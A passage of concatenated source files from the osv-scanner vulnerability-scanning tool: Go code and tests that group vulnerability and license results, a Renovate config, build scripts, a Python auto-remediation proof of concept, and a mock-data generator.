"https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ], "experimental_config": { "call_analysis": { "enabled": false }, "licenses": { "enabled": false, "allowlist": null } } } ================================================ FILE: pkg/osvscanner/testmain_test.go ================================================ package osvscanner_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: pkg/osvscanner/vulnerability_result.go ================================================ package osvscanner import ( "path/filepath" "slices" "sort" "strings" "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx" cdxmeta "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx/metadata" "github.com/google/osv-scalibr/inventory/vex" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/grouper" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/sourceanalysis" "github.com/google/osv-scanner/v2/internal/spdx" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner/internal/imagehelpers" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // buildVulnerabilityResults takes the responses from the OSV API and the deps.dev API // and converts this into a VulnerabilityResults. As part is this, it groups // vulnerability information by source location. // TODO: This function is getting long, we should refactor it func buildVulnerabilityResults( actions ScannerActions, scanResults *results.ScanResults, ) models.VulnerabilityResults { vulnResults := models.VulnerabilityResults{ Results: []models.PackageSource{}, ImageMetadata: imagehelpers.BuildImageMetadata(scanResults), ExperimentalGenericFindings: scanResults.Inventory.GenericFindings, } type packageVulnsGroup struct { pvs []models.PackageVulns annotations []*vex.PackageExploitabilitySignal } groupedBySource := map[models.SourceInfo]*packageVulnsGroup{} for i, p := range scanResults.PackageScanResults { includePackage := actions.ShowAllPackages var pkg models.PackageVulns pkg.Package.Inventory = p if imodels.Commit(p) != "" { pkg.Package.Commit = imodels.Commit(p) pkg.Package.Name = imodels.Name(p) } pkg.Package.Name = imodels.Name(p) pkg.Package.Version = imodels.Version(p) pkg.Package.Ecosystem = imodels.Ecosystem(p).String() pkg.Package.OSPackageName = imodels.OSPackageName(p) pkg.Package.Deprecated = p.Deprecated if pkg.Package.Deprecated { includePackage = true } if p.LayerMetadata != nil { pkg.Package.ImageOrigin = &models.ImageOriginDetails{ Index: p.LayerMetadata.Index, } } pkg.DepGroups = imodels.DepGroups(p) configToUse := scanResults.ConfigManager.Get(imodels.Location(p)) haveCheckedIgnore := false for _, vuln := range scanResults.Inventory.PackageVulns { if vuln.Package == p { if !haveCheckedIgnore { if configToUse.ShouldIgnorePackageVulnerabilities(p) { break } haveCheckedIgnore = true } includePackage = true pkg.Vulnerabilities = append(pkg.Vulnerabilities, vuln.Vulnerability) } } pkg.Groups = grouper.Group(grouper.ConvertVulnerabilityToIDAliases(pkg.Vulnerabilities)) for i, group := range pkg.Groups { pkg.Groups[i].MaxSeverity = output.MaxSeverity(group, pkg) } // For Debian-based ecosystems, mark unimportant vulnerabilities within the package. // Debian ecosystems may be listed with a version number, such as "Debian:10". if strings.HasPrefix(pkg.Package.Ecosystem, string(osvconstants.EcosystemDebian)) || strings.HasPrefix(pkg.Package.Ecosystem, string(osvconstants.EcosystemUbuntu)) { setUnimportant(&pkg) } if actions.CallAnalysisStates["jar"] { setUncalled(&pkg) } if actions.ScanLicensesSummary || len(actions.ScanLicensesAllowlist) > 0 { if override, entry := configToUse.ShouldOverridePackageLicense(p); override { if entry.License.Ignore { cmdlogger.Infof("ignoring license for package %s/%s/%s", pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version) p.Licenses = []string{} } else { cmdlogger.Infof("overriding license for package %s/%s/%s with %s", pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version, strings.Join(entry.License.Override, ",")) p.Licenses = entry.License.Override } } if len(actions.ScanLicensesAllowlist) > 0 { pkg.Licenses = make([]models.License, len(p.Licenses)) for j, license := range p.Licenses { pkg.Licenses[j] = models.License(license) } for _, license := range pkg.Licenses { satisfies, err := spdx.Satisfies(license, actions.ScanLicensesAllowlist) if err != nil { cmdlogger.Errorf("license %s for package %s/%s/%s is invalid: %s", license, pkg.Package.Ecosystem, pkg.Package.Name, pkg.Package.Version, err) } if !satisfies { pkg.LicenseViolations = append(pkg.LicenseViolations, license) } } if len(pkg.LicenseViolations) > 0 { includePackage = true } } if actions.ScanLicensesSummary { pkg.Licenses = make([]models.License, len(p.Licenses)) for j, license := range p.Licenses { pkg.Licenses[j] = models.License(license) } } // Make sure licenses are overridden in the scan results. scanResults.PackageScanResults[i] = p } if includePackage { source := models.SourceInfo{ Path: filepath.ToSlash(imodels.Location(p)), Type: imodels.SourceType(p), } if slices.Contains(p.Plugins, cdx.Name) { locations := p.Metadata.(*cdxmeta.Metadata).CDXLocations if len(locations) > 0 { source.Path = source.Path + ":" + locations[0] } } if groupedBySource[source] == nil { groupedBySource[source] = &packageVulnsGroup{} } groupedBySource[source].pvs = append(groupedBySource[source].pvs, pkg) // Overwrite annotations as it should be the same for the same package. groupedBySource[source].annotations = p.ExploitabilitySignals } } // TODO(v2): Move source analysis out of here. for source, packages := range groupedBySource { sourceanalysis.Run(source, packages.pvs, actions.CallAnalysisStates) vulnResults.Results = append(vulnResults.Results, models.PackageSource{ Source: source, ExperimentalPES: packages.annotations, Packages: packages.pvs, }) } sort.Slice(vulnResults.Results, func(i, j int) bool { if vulnResults.Results[i].Source.Path == vulnResults.Results[j].Source.Path { return vulnResults.Results[i].Source.Type < vulnResults.Results[j].Source.Type } return vulnResults.Results[i].Source.Path < vulnResults.Results[j].Source.Path }) if len(actions.ScanLicensesAllowlist) > 0 || actions.ScanLicensesSummary { vulnResults.ExperimentalAnalysisConfig.Licenses.Summary = actions.ScanLicensesSummary allowlist := make([]models.License, len(actions.ScanLicensesAllowlist)) for i, l := range actions.ScanLicensesAllowlist { allowlist[i] = models.License(l) } vulnResults.ExperimentalAnalysisConfig.Licenses.Allowlist = allowlist } return vulnResults } func setUncalled(pv *models.PackageVulns) { // Use index to keep reference to original element in slice for groupIdx := range pv.Groups { for _, vulnID := range pv.Groups[groupIdx].IDs { analysis := &pv.Groups[groupIdx].ExperimentalAnalysis if *analysis == nil { *analysis = make(map[string]models.AnalysisInfo) } isUncalled := false for _, e := range pv.Package.Inventory.ExploitabilitySignals { if e.Justification == vex.VulnerableCodeNotInExecutePath { isUncalled = true break } } (*analysis)[vulnID] = models.AnalysisInfo{ Called: !isUncalled, Unimportant: (*analysis)[vulnID].Unimportant, } } } } // setUnimportant marks vulnerabilities in a PackageVulns as unimportant // within their respective groups' experimental analysis. func setUnimportant(pkg *models.PackageVulns) { for _, vuln := range pkg.Vulnerabilities { if !isUnimportant(vuln) { continue } for i, group := range pkg.Groups { if slices.Contains(group.IDs, vuln.GetId()) { if group.ExperimentalAnalysis == nil { pkg.Groups[i].ExperimentalAnalysis = make(map[string]models.AnalysisInfo) } // Set unimportant vulns as uncalled pkg.Groups[i].ExperimentalAnalysis[vuln.GetId()] = models.AnalysisInfo{ Unimportant: true, // TODO(gongh@): Currently, call analysis is not supported for Linux distribution vulnerabilities. // Except explicitly set Called as true to not be counted as uncalled vulnerabilities. // Update this behavior when call analysis for Linux distributions is implemented. Called: true, } break } } } } // isUnimportant checks if a Debian-based vulnerability is tagged as unimportant // Debian: https://security-team.debian.org/security_tracker.html#severity-levels // Ubuntu: https://ubuntu.com/security/cves/about#priority func isUnimportant(vuln *osvschema.Vulnerability) bool { for _, severity := range vuln.GetSeverity() { // TODO(gongh@): remove checking empty severity type after all ubuntu records have a valid severity tag. if strings.HasPrefix(vuln.GetId(), "UBUNTU-CVE-") && (severity.GetType() == osvschema.Severity_Ubuntu || severity.GetType() == osvschema.Severity_UNSPECIFIED) { return severity.GetScore() == "negligible" } } for _, affected := range vuln.GetAffected() { if es := affected.GetEcosystemSpecific(); es != nil { if fields := es.GetFields(); fields != nil { if urgency, ok := fields["urgency"]; ok && urgency != nil { if urgency.GetStringValue() == "unimportant" { return true } } // TODO (gongh@): Remove this once Ubuntu has fully moved all priority tags into the severity field. if priority, ok := fields["ubuntu_priority"]; ok && priority != nil { if priority.GetStringValue() == "negligible" { return true } } } } } return false } ================================================ FILE: pkg/osvscanner/vulnerability_result_internal_test.go ================================================ package osvscanner import ( "testing" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/purl" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // makeScanResults returns a unique instance of results.ScanResults for use in tests, // to avoid mutations impacting other test cases func makeScanResults() *results.ScanResults { scanResults := &results.ScanResults{ Inventory: inventory.Inventory{ Packages: []*extractor.Package{ { Name: "pkg-1", PURLType: purl.TypeNPM, Plugins: []string{packagelockjson.Name}, Version: "1.0.0", Location: extractor.LocationFromPath("dir/package-lock.json"), Licenses: []string{"MIT", "0BSD"}, }, { Name: "pkg-2", PURLType: purl.TypeNPM, Plugins: []string{packagelockjson.Name}, Version: "1.0.0", Location: extractor.LocationFromPath("dir/package-lock.json"), Licenses: []string{"MIT"}, }, { Name: "pkg-3", PURLType: purl.TypeNPM, Plugins: []string{packagelockjson.Name}, Version: "1.0.0", Location: extractor.LocationFromPath("other-dir/package-lock.json"), Licenses: []string{"UNKNOWN"}, }, }, }, ConfigManager: config.Manager{}, } // add vulnerabilities, with pointer references to their impacted packages scanResults.Inventory.PackageVulns = []*inventory.PackageVuln{ { Vulnerability: &osvschema.Vulnerability{Id: "GHSA-123", Aliases: []string{"CVE-123"}}, Package: scanResults.Inventory.Packages[0], }, { Vulnerability: &osvschema.Vulnerability{Id: "CVE-123"}, Package: scanResults.Inventory.Packages[0], }, { Vulnerability: &osvschema.Vulnerability{Id: "GHSA-456"}, Package: scanResults.Inventory.Packages[2], }, } // add the package scan results, with pointer references to their underlying packages for _, pkg := range scanResults.Inventory.Packages { licenses := make([]models.License, len(pkg.Licenses)) for i, lic := range pkg.Licenses { licenses[i] = models.License(lic) } scanResults.PackageScanResults = append(scanResults.PackageScanResults, pkg) } return scanResults } func Test_assembleResult(t *testing.T) { t.Parallel() type args struct { actions ScannerActions scanResults *results.ScanResults config config.Manager } callAnalysisStates := make(map[string]bool) tests := []struct { name string args args }{ { name: "group_vulnerabilities", args: args{ scanResults: makeScanResults(), actions: ScannerActions{ ShowAllPackages: false, ScanLicensesAllowlist: nil, CallAnalysisStates: callAnalysisStates, }, }, }, { name: "group_vulnerabilities_with_all_packages_included", args: args{ scanResults: makeScanResults(), actions: ScannerActions{ ShowAllPackages: true, ScanLicensesAllowlist: nil, CallAnalysisStates: callAnalysisStates, }, }, }, { name: "group_vulnerabilities_with_licenses", args: args{ scanResults: makeScanResults(), actions: ScannerActions{ ShowAllPackages: true, ScanLicensesSummary: true, ScanLicensesAllowlist: nil, CallAnalysisStates: callAnalysisStates, }, }, }, { name: "group_vulnerabilities_with_license_allowlist", args: args{ scanResults: makeScanResults(), actions: ScannerActions{ ShowAllPackages: false, ScanLicensesAllowlist: []string{"MIT", "0BSD"}, CallAnalysisStates: callAnalysisStates, }, }, }, { name: "group_vulnerabilities_with_license_allowlist_and_license_override", args: args{ scanResults: makeScanResults(), actions: ScannerActions{ ShowAllPackages: false, ScanLicensesAllowlist: []string{"MIT", "0BSD"}, CallAnalysisStates: callAnalysisStates, }, config: config.Manager{ OverrideConfig: &config.Config{ PackageOverrides: []config.PackageOverrideEntry{ { Name: "pkg-3", Ecosystem: "npm", License: config.License{ Override: []string{"MIT"}, }, }, }, }, }, }, }, { name: "group_vulnerabilities_with_license_allowlist_and_all_packages", args: args{ scanResults: makeScanResults(), actions: ScannerActions{ ShowAllPackages: true, ScanLicensesAllowlist: []string{"MIT", "0BSD"}, CallAnalysisStates: callAnalysisStates, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() tt.args.scanResults.ConfigManager = tt.args.config got := buildVulnerabilityResults(tt.args.actions, tt.args.scanResults) testutility.NewSnapshot().MatchJSON(t, got) }) } } ================================================ FILE: renovate.json ================================================ { "$schema": "https://docs.renovatebot.com/renovate-schema.json", "extends": ["config:recommended"], "timezone": "Australia/Sydney", "schedule": ["before 6am on monday"], "labels": ["dependencies"], "postUpdateOptions": ["gomodTidy"], "osvVulnerabilityAlerts": true, "lockFileMaintenance": { "enabled": true }, "packageRules": [ { "matchUpdateTypes": ["major"], "groupName": "Major Updates" }, { "matchCategories": ["golang"], "groupName": "osv-scanner minor" }, { "matchFileNames": [".github/**"], "groupName": "workflows" }, { "matchPackageNames": ["github.com/google/osv-scalibr"], "groupName": "osv-scalibr", "enabled": false } ], "ignorePaths": ["**/testdata/**"], "ignoreDeps": ["golang.org/x/vuln"] } ================================================ FILE: scripts/build.sh ================================================ #!/usr/bin/env bash set -e go build ./cmd/osv-scanner/ ================================================ FILE: scripts/build_snapshot.sh ================================================ #!/usr/bin/env bash set -e goreleaser build --clean --single-target --snapshot ================================================ FILE: scripts/build_test_images.sh ================================================ #!/usr/bin/env bash set -e # this is inverted because docker build takes "--no-cache", # so "false" here means that the layer cache will be used no_layer_cache=false function build_docker_image_fixture { image_name="$1" output_tar="cmd/osv-scanner/scan/image/testdata/$image_name.tar" if [ ! -f "$output_tar" ]; then docker build cmd/osv-scanner/scan/image/testdata/ -f "cmd/osv-scanner/scan/image/testdata/$image_name.Dockerfile" -t "osv-scanner/$image_name:latest" --no-cache="$no_layer_cache" docker image save "osv-scanner/$image_name:latest" -o "$output_tar" echo "finished building $output_tar (did not exist)" else echo "skipped building $output_tar (already exists)" fi } force=false while [[ $# -gt 0 ]]; do case $1 in --force) force=true shift ;; --no-cache) no_layer_cache=true shift ;; *) echo "Unknown argument: $1" exit 1 ;; esac done for dockerfile in cmd/osv-scanner/scan/image/testdata/*.Dockerfile; do image_name=$(basename "$dockerfile" .Dockerfile) if [ "$force" = true ]; then echo "Removing existing tar file for $image_name..." rm "cmd/osv-scanner/scan/image/testdata/$image_name.tar" fi build_docker_image_fixture "$image_name" done ================================================ FILE: scripts/examples/auto_guided_remediation.py ================================================ #!/usr/bin/env python3 """ Proof of concept demonstrating an automated guided remediation patching workflow. We progressively try more and more patches until tests fail. Requires osv-scanner to be in your PATH. """ import os.path import re import subprocess import sys from typing import List, Tuple PATCH_STRATEGIES = [ ['--strategy=in-place'], # Try every single transitive dependency upgrade without relocking or bumping direct dependencies.json. ['--strategy=relock'], # Relock the manifest and try direct dependency bumps. # This could also include things like: # '--min-severity=X' Minimum severity of vulnerabilities to consider. # '--max-depth=Y': Maximum (shortest) dependency depth # '--upgrade-config={major/minor/patch}': What level of package upgrades are allowed. # etc... which can help reduce/increase the scope of changes by prioritizing vulnerabilities according to these filters. # e.g. ['--strategy=relock', '--upgrade-config=minor', '--max-depth=5'], # Relock the manifest and try direct dependency bumps. # See `osv-scanner fix --help`. ] if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} ') sys.exit(1) directory = sys.argv[1] osv_fix_args = sys.argv[2:] # check if the directory is within a git repo if subprocess.call(['git', '-C', directory, 'rev-parse']): print(f'{directory} is not part of a git repository') sys.exit(1) manifest = os.path.join(directory, 'package.json') lockfile = os.path.join(directory, 'package-lock.json') def run_fix(n_patches: int, avoid_pkgs: List[str], strategy: List[str]) -> Tuple[List[str], int, int]: # restore package.json & package-lock.json subprocess.check_call(['git', 'checkout', 'package.json', 'package-lock.json'], cwd=directory) # run osv-fix and parse changes cmd = ['osv-scanner', 'fix', '-M', manifest, '-L', lockfile] + osv_fix_args + strategy # 0 is a magic value that means we try all patches. if n_patches != 0: cmd.extend(['--apply-top', str(n_patches)]) for pkg in avoid_pkgs: cmd.extend(['--upgrade-config', f'{pkg}:none']) try: output = subprocess.check_output(cmd, text=True) except subprocess.CalledProcessError as e: output = (e.stdout or '') + (e.stderr or '') upgraded = [m[1] for m in re.finditer(r'UPGRADED-PACKAGE: (.*),(.*),(.*)', output)] remaining_vulns = None unfixable_vulns = None match = re.search(r'REMAINING-VULNS:\s*(\d+)', output) if match: remaining_vulns = int(match.group(1)) match = re.search(r'UNFIXABLE-VULNS:\s*(\d+)', output) if match: unfixable_vulns = int(match.group(1)) return upgraded, remaining_vulns, unfixable_vulns def run_loop(strategy: List[str]) -> Tuple[List[str], int, int, List[str]]: valid = [] avoid = [] # 0 is a special value meaning that we try applying every patch. This is # meant as a shortcut in case this would've succeeded anyway. n_patches = 0 print('===== Attempting auto-patch with strategy', strategy, '=====') remaining = None total_unfixable = None while True: changes, remaining, unfixable = run_fix(n_patches, avoid, strategy) if changes == valid: # if the result of running osv-fix hasn't changed, then we've run out of patches to apply break print('===== Trying to upgrade:', changes, '=====') print('===== Current blocklist:', avoid, '=====') # check the install & tests if subprocess.call(['npm', 'ci'], cwd=directory) or subprocess.call(['npm', 'run', 'test'], cwd=directory): # tests failed if n_patches == 0: # First try with every single patch. # Record the unfixable count using this, as it represents the real # unfixable count if every possible package upgrade was allowed. total_unfixable = unfixable n_patches += 1 continue print('===== Tests failed, blocklisting upgrades =====') # add each new package to the avoid list for c in changes: if c not in valid: avoid.append(c) print('===== Current blocklist:', avoid, '=====') else: # tests passed if n_patches == 0: valid = changes break # try now with the next patch valid = changes n_patches += 1 if valid: print() print('===== The following packages have been changed and verified against the tests: =====') for v in valid: print(v) return valid, remaining, total_unfixable, avoid best_strategy = None best_changes = [] best_avoid = [] best_remaining = 10000000 best_unfixable = None for strategy in PATCH_STRATEGIES: changes, remaining, unfixable, avoid = run_loop(strategy) if changes and remaining < best_remaining: best_strategy = strategy best_changes = changes best_avoid = avoid best_remaining = remaining best_unfixable = unfixable print() print('===== Auto-patch completed with the following changed packages =====') print('Best strategy:', best_strategy) for v in best_changes: print(v) print('The follow packages cannot be upgraded due to failing tests:') for v in best_avoid: print(v) print() print(best_remaining, 'vulnerabilities remain') if best_unfixable: print(best_unfixable, 'vulnerabilities are impossible to fix by package upgrades') ================================================ FILE: scripts/generate_coverage_report.sh ================================================ #!/usr/bin/env bash set -e ./scripts/run_tests.sh go tool cover -html=coverage.out -o coverage.html ================================================ FILE: scripts/generate_mock_resolution_universe/main.go ================================================ // Package main generates a mock resolution universe file for testing. package main // Generate a MockResolutionClient universe file based on real packages encountered during in-place and/or relock updates. // Used for generating testdata. // Usage: go run ./generate_mock_resolution_universe -universeFile -vulnFile [list of manifests / lockfiles] // Will automatically attempt in-place updates and relock/relax updates on all supplied lockfiles/manifests, // And write all encountered package versions to a universe file, and all vulnerabilities for each package to a vulnerability file. // Lockfiles/manifests are assumed to be all from the same ecosystem. import ( "bytes" "context" "encoding/gob" "encoding/json" "errors" "flag" "fmt" "maps" "net/http" "os" "path/filepath" "slices" "strings" "time" pb "deps.dev/api/v3" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/osvmatcher" "github.com/google/osv-scanner/v2/internal/clients/clientinterfaces" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/version" "github.com/ossf/osv-schema/bindings/go/osvschema" "go.yaml.in/yaml/v3" "golang.org/x/sync/errgroup" "google.golang.org/protobuf/encoding/protojson" "osv.dev/bindings/go/api" "osv.dev/bindings/go/osvdev" ) var remediationOpts = remediation.Options{ ResolveOpts: resolution.ResolveOpts{ MavenManagement: true, }, DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } const userAgent = "osv-scanner_generate_mock/" + version.OSVVersion func vulnMatcher() clientinterfaces.VulnerabilityMatcher { config := osvdev.DefaultConfig() config.UserAgent = userAgent return &osvmatcher.CachedOSVMatcher{ Client: osvdev.OSVClient{ HTTPClient: http.DefaultClient, Config: config, BaseHostURL: osvdev.DefaultBaseURL, }, InitialQueryTimeout: 5 * time.Minute, } } func doRelockRelax(ddCl *client.DepsDevClient, rw manifest.ReadWriter, filename string) error { cl := client.ResolutionClient{ VulnerabilityMatcher: vulnMatcher(), DependencyClient: ddCl, } f, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } defer f.Close() manif, err := rw.Read(f) if err != nil { return err } client.PreFetch(context.Background(), cl, manif.Requirements, manif.FilePath) res, err := resolution.Resolve(context.Background(), cl, manif, remediationOpts.ResolveOpts) if err != nil { return err } _, err = remediation.ComputeRelaxPatches(context.Background(), cl, res, remediationOpts) return err } func doOverride(ddCl *client.DepsDevClient, rw manifest.ReadWriter, filename string) error { cl := client.ResolutionClient{ VulnerabilityMatcher: vulnMatcher(), DependencyClient: ddCl, } f, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } defer f.Close() manif, err := rw.Read(f) if err != nil { return err } client.PreFetch(context.Background(), cl, manif.Requirements, manif.FilePath) res, err := resolution.Resolve(context.Background(), cl, manif, remediationOpts.ResolveOpts) if err != nil { return err } _, err = remediation.ComputeOverridePatches(context.Background(), cl, res, remediationOpts) return err } func doInPlace(ddCl *client.DepsDevClient, rw lockfile.ReadWriter, filename string) error { cl := client.ResolutionClient{ VulnerabilityMatcher: vulnMatcher(), DependencyClient: ddCl, } f, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } defer f.Close() g, err := rw.Read(f) if err != nil { return err } // In-place updating doesn't actually check the client for the packages in the lockfile. // For good measure, we do it here to load them into the cache. group := &errgroup.Group{} for _, n := range g.Nodes { vk := n.Version group.Go(func() error { _, err := ddCl.Requirements(context.Background(), vk) return err }) } _ = group.Wait() _, err = remediation.ComputeInPlacePatches(context.Background(), cl, g, remediationOpts) return err } func getCachedVersions(cl *client.DepsDevClient) (map[resolve.PackageKey][]string, error) { // Abuse the cache writing to get the list of encountered package versions. cachePath := filepath.Join(os.TempDir(), "gr-cache") if err := cl.WriteCache(cachePath); err != nil { return nil, err } cacheFile := cachePath + ".resolve.deps" defer os.Remove(cacheFile) b, err := os.ReadFile(cacheFile) if err != nil { return nil, err } var cache depsdevAPICache dec := gob.NewDecoder(bytes.NewReader(b)) if err := dec.Decode(&cache); err != nil { return nil, err } pkgVers := make(map[resolve.PackageKey][]string) for vk := range cache.RequirementsCache { pk := resolve.PackageKey{ Name: vk.Name, System: resolve.System(vk.System), } pkgVers[pk] = append(pkgVers[pk], vk.Version) } return pkgVers, nil } // Copy the relevant cache format from the depsdev_api_cache type depsdevAPICache struct { RequirementsCache map[struct { System pb.System Name string Version string }][]byte } func (t *depsdevAPICache) GobDecode(b []byte) error { type c depsdevAPICache dec := gob.NewDecoder(bytes.NewReader(b)) return dec.Decode((*c)(t)) } func makeUniverse(cl *client.DepsDevClient) (clienttest.ResolutionUniverse, clienttest.VulnerabilityMatcher, error) { pkgs, err := getCachedVersions(cl) if err != nil { return clienttest.ResolutionUniverse{}, clienttest.VulnerabilityMatcher{}, err } pks := slices.AppendSeq(make([]resolve.PackageKey, 0, len(pkgs)), maps.Keys(pkgs)) slices.SortFunc(pks, func(a, b resolve.PackageKey) int { return a.Compare(b) }) if len(pks) == 0 { return clienttest.ResolutionUniverse{}, clienttest.VulnerabilityMatcher{}, errors.New("no packages found in cache") } // assume every package is the same system system := pks[0].System // Build the schema string. schema := &strings.Builder{} for _, pk := range pks { vers := pkgs[pk] slices.SortFunc(vers, system.Semver().Compare) fmt.Fprintln(schema, pk.Name) for _, v := range vers { fmt.Fprintln(schema, "\t"+v) reqs, err := cl.Requirements(context.Background(), resolve.VersionKey{ PackageKey: pk, Version: v, VersionType: resolve.Concrete, }) if err != nil { continue } for _, r := range reqs { // Don't bother writing Dev or Test dependencies. if r.Type.HasAttr(dep.Dev) || r.Type.HasAttr(dep.Test) { continue } str := r.Name + "@" + r.Version typeStr := typeString(r.Type) if typeStr != "" { str = typeStr + "|" + str } fmt.Fprintf(schema, "\t\t%s\n", str) } } } // Get all vulns for all versions of all packages. // It's easier to re-query this than to try to use the vulnerability client's cache. batchQueries := make([]*api.Query, len(pks)) for i, pk := range pks { batchQueries[i] = &api.Query{ Package: &osvschema.Package{ Name: pk.Name, Ecosystem: string(util.OSVEcosystem[pk.System]), }, } } batchResp, err := osvdev.DefaultClient().QueryBatch(context.Background(), batchQueries) if err != nil { return clienttest.ResolutionUniverse{}, clienttest.VulnerabilityMatcher{}, err } vulnerabilities := make([][]*osvschema.Vulnerability, len(batchResp.GetResults())) g, ctx := errgroup.WithContext(context.Background()) g.SetLimit(1000) for batchIdx, resp := range batchResp.GetResults() { vulnerabilities[batchIdx] = make([]*osvschema.Vulnerability, len(resp.GetVulns())) for resultIdx, vuln := range resp.GetVulns() { g.Go(func() error { // exit early if another hydration request has already failed // results are thrown away later, so avoid needless work if ctx.Err() != nil { return nil //nolint:nilerr // this value doesn't matter to errgroup.Wait() } vuln, err := osvdev.DefaultClient().GetVulnByID(ctx, vuln.GetId()) if err != nil { return err } vulnerabilities[batchIdx][resultIdx] = vuln return nil }) } } if err := g.Wait(); err != nil { return clienttest.ResolutionUniverse{}, clienttest.VulnerabilityMatcher{}, err } var vulns []*osvschema.Vulnerability for _, r := range vulnerabilities { vulns = append(vulns, r...) } return clienttest.ResolutionUniverse{System: system.String(), Schema: schema.String()}, clienttest.VulnerabilityMatcher{Vulns: vulns}, nil } // These are just the relevant AttrKeys for our supported ecosystems. var flagAttrs = [...]dep.AttrKey{dep.Dev, dep.Opt, dep.Test} // Keys without values var valueAttrs = [...]dep.AttrKey{dep.Scope, dep.MavenClassifier, dep.MavenArtifactType, dep.MavenDependencyOrigin, dep.MavenExclusions, dep.KnownAs, dep.Selector} func typeString(t dep.Type) string { // dep.Type.String() is not the same format as what the universe schema wants. // Manually construct the valid string. var parts []string for _, attr := range flagAttrs { if t.HasAttr(attr) { parts = append(parts, attr.String()) } } for _, attr := range valueAttrs { if value, ok := t.GetAttr(attr); ok { parts = append(parts, attr.String(), strings.ReplaceAll(value, "|", ",")) // Must convert the MavenExclusions separator. } } return strings.Join(parts, " ") } func run() error { universeFile := flag.String("universeFile", "universe.yaml", "output file for the resolution universe") vulnFile := flag.String("vulnFile", "vulns.json", "output file for the vulnerabilities") flag.Parse() cl, err := client.NewDepsDevClient(depsdev.DepsdevAPI, userAgent) if err != nil { return err } group := &errgroup.Group{} for _, filename := range flag.Args() { if io, err := manifest.GetReadWriter(filename, ""); err == nil { if remediation.SupportsRelax(io) { group.Go(func() error { err := doRelockRelax(cl, io, filename) if err != nil { return fmt.Errorf("failed to relock/relax %s: %w", filename, err) } return nil }) } if remediation.SupportsOverride(io) { group.Go(func() error { err := doOverride(cl, io, filename) if err != nil { return fmt.Errorf("failed to relock/override %s: %w", filename, err) } return nil }) } } if io, err := lockfile.GetReadWriter(filename); err == nil { if remediation.SupportsInPlace(io) { group.Go(func() error { err := doInPlace(cl, io, filename) if err != nil { return fmt.Errorf("failed to in-place update %s: %w", filename, err) } return nil }) } } } if err := group.Wait(); err != nil { fmt.Fprintln(os.Stderr, err) } universe, vulns, err := makeUniverse(cl) if err != nil { return fmt.Errorf("error making universe: %w", err) } uFile, err := os.Create(*universeFile) if err != nil { return fmt.Errorf("error creating universe file: %w", err) } defer uFile.Close() fmt.Fprintf(uFile, "# Automatically generated by generate_mock_resolution_universe on %s. DO NOT EDIT.\n", time.Now().Format(time.RFC822)) uEnc := yaml.NewEncoder(uFile) uEnc.SetIndent(2) if err := uEnc.Encode(universe); err != nil { return fmt.Errorf("error encoding universe: %w", err) } vFile, err := os.Create(*vulnFile) if err != nil { return fmt.Errorf("error creating vuln file: %w", err) } defer vFile.Close() // Marshal each vulnerability using protojson to get human-readable timestamps vulnsJSON := make([]json.RawMessage, 0, len(vulns.Vulns)) marshaler := protojson.MarshalOptions{} for _, v := range vulns.Vulns { jsonBytes, err := marshaler.Marshal(v) if err != nil { return fmt.Errorf("error marshalling vuln to json: %w", err) } vulnsJSON = append(vulnsJSON, jsonBytes) } vulnsData := map[string]any{ "vulns": vulnsJSON, } vEnc := json.NewEncoder(vFile) vEnc.SetIndent("", " ") if err := vEnc.Encode(vulnsData); err != nil { return fmt.Errorf("error encoding vulns: %w", err) } return nil } func main() { if err := run(); err != nil { 